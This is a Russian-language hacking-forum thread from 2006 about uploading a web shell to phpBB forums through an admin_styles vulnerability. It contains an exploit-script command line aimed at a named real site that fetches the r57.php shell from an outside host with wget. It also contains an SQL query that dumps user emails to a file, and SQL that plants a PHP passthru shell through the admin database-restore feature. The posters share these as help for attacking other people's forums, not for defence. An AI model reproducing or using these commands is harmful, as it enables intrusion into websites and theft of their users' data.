HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу phpBB. Как залить шелл через уязвимость в admin_styles?
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

phpBB. Как залить шелл через уязвимость в admin_styles?
  #1  
Старый 13.01.2006, 18:49
Grema
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
С нами: 10761096

Репутация: 27
По умолчанию phpBB. Как залить шелл через уязвимость в admin_styles?
Как залить шелл? есть админка, есть r57phpbb_admin.pl
юзаю его... пытаюсь сдлеать wget не пашет... как правельно юзать wget? может я чтото неправельно написал?
З.Ы. стоит Linux
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 13.01.2006, 19:02
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
С нами: 11087066

Репутация: 561


По умолчанию
wget -o серверный_путь путь_к_твоему_шеллу.
В следующий раз попробуй найти это через поиск.
зы. wget может вообще не быть. В общем всё это ещё раз описывалось в течении двух последних дней.
__________________
Full DNS report
 
Ответить с цитированием

  #3  
Старый 13.01.2006, 20:12
Grema
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
С нами: 10761096

Репутация: 27
По умолчанию
чтото не кактит...
з.Ы. wget есть точно...
юзал так
Код:
V:\Kxe\exploit>admin.pl -p http://pvp-alfa.ru/phpBB2/admin/ -s 772dfdcc06191a8f3
da9b8e161c6856e -c "wget -o /home/webadmin/pvp-alfa.com.ru/html/phpBB2/cache/r57
.php http://games.tenet.ua/board/uploads/r57.php"
и так

Код:
V:\Kxe\exploit>admin.pl -p http://pvp-alfa.ru/phpBB2/admin/ -s 772dfdcc06191a8f3
da9b8e161c6856e -c "wget -o r57.php http://games.tenet.ua/board/uploads/r57.php"
 
Ответить с цитированием

  #4  
Старый 13.01.2006, 20:42
Nova
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
С нами: 10958786

Репутация: 1034


По умолчанию
Цитата:
Сообщение от Grema  
Как залить шелл? есть админка, есть r57phpbb_admin.pl
юзаю его... пытаюсь сдлеать wget не пашет... как правельно юзать wget? может я чтото неправельно написал?
З.Ы. стоит Linux
Поюзай поиск на форуме это уже обсуждалось !
Azazel правильно сказал !
 
Ответить с цитированием

  #5  
Старый 13.01.2006, 20:44
_-[A.M.D]HiM@S-_
Green member
Регистрация: 28.12.2005
Сообщений: 376
С нами: 10719686

Репутация: 1833
По умолчанию
Через БД
 
Ответить с цитированием

  #6  
Старый 13.01.2006, 20:48
Nova
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
С нами: 10958786

Репутация: 1034


По умолчанию
Цитата:
Сообщение от _-[A.M.D]HiM@S-_  
Через БД
а не влом сливать 30 метров базы к примеру править её и заливать обратно ????

а если как на этом форуме http://пожалуста.безссылок.ru

Там пользователей и тем валом у них база 1GB весит не бось....
Так что это не вариант.....
Последний раз редактировалось Azazel; 13.01.2006 в 22:32..
 
Ответить с цитированием

  #7  
Старый 25.01.2006, 15:46
RUc
Новичок
Регистрация: 19.09.2005
Сообщений: 24
С нами: 10863746

Репутация: 2
По умолчанию
Цитата:
Сообщение от Nova  
а не влом сливать 30 метров базы к примеру править её и заливать обратно ????

а если как на этом форуме http://пожалуста.безссылок.ru

Там пользователей и тем валом у них база 1GB весит не бось....
Так что это не вариант.....
Ты можешь представить себе 1 Gb текста?
БД почтовых отделений России весит около 4 М и имеет около 40 000 записей. Думаю с 1 Gb ты перебрал малость
 
Ответить с цитированием

  #8  
Старый 13.01.2006, 22:21
_-[A.M.D]HiM@S-_
Green member
Регистрация: 28.12.2005
Сообщений: 376
С нами: 10719686

Репутация: 1833
По умолчанию
Там помойму стоит 2.0.16
 
Ответить с цитированием

  #9  
Старый 14.01.2006, 01:29
_lolik_
Познающий
Регистрация: 08.01.2006
Сообщений: 91
С нами: 10704511

Репутация: 5
По умолчанию
SELECT email FROM users INTO OUTFILE 'c:/text.txt'
это для мейлов, дла хешей немного другая команда в БД
 
Ответить с цитированием

  #10  
Старый 14.01.2006, 03:22
Grrl
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
С нами: 11481506

Репутация: 97
По умолчанию
сливать базу не обязательно можно и подругому - так создать файл с содержанием:

UPDATE phpbb_categories SET cat_title='<? passthru("$cmd"); ?>'WHERE cat_id=1;
SELECT cat_title INTO OUTFILE '/home/bla_bla_bla/shell.php' FROM phpbb_categories where cat_id=1;

потом просто выбираешь в админке восстановить базу и указываешь путь к этому файу. это создаст шел не испортив основную базу.
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
залить шелл через ipb 2.0.4 alakazam Уязвимости CMS / форумов 4 16.11.2005 22:08
Вопрос о залиаке шелла через phpBB 2.0.6. Guest Уязвимости CMS / форумов 6 23.12.2004 22:12
Как залить шелл через PhPBB SheFF Уязвимости CMS / форумов 5 29.11.2004 01:25
Как залить шелл через IPB форум, при отсутствии ftp? bbmz Уязвимости CMS / форумов 1 26.11.2004 18:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.